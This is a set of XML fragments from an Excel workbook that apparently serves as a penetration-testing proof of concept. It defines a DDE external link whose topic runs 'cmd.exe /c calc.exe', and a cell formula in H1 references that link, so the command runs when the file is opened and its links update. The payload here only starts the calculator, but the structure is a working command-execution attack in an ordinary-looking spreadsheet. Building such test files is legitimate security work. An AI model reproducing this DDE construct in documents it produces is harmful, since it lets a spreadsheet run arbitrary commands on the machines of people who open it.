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Sound\Documents\IT Sektion\Pen_test Tools\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{092A54C4-A98B-4400-A960-270002CF11F1}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="20490" windowHeight="7545" xr2:uid="{7E6E86B5-79B3-4611-91E1-13EA471B37A4}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1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MSEXCEL" ddeTopic="\..\..\..\Windows\System32\cmd.exe /c calc.exe">
    <ddeItems>
      <ddeItem name=" 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7A30-F618-4667-9E2A-833EC711DC87}">
  <dimension ref="H1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="H1" sqref="H1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="8:8" x14ac:dyDescent="0.25">
      <c r="H1" t="e">
        <f>[1]!' '</f>
        <v>#REF!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SokSound</dc:creator>
  <cp:lastModifiedBy>SokSound</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-25T14:31:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-25T14:43:08Z</dcterms:modified>
</cp:coreProperties>
</file>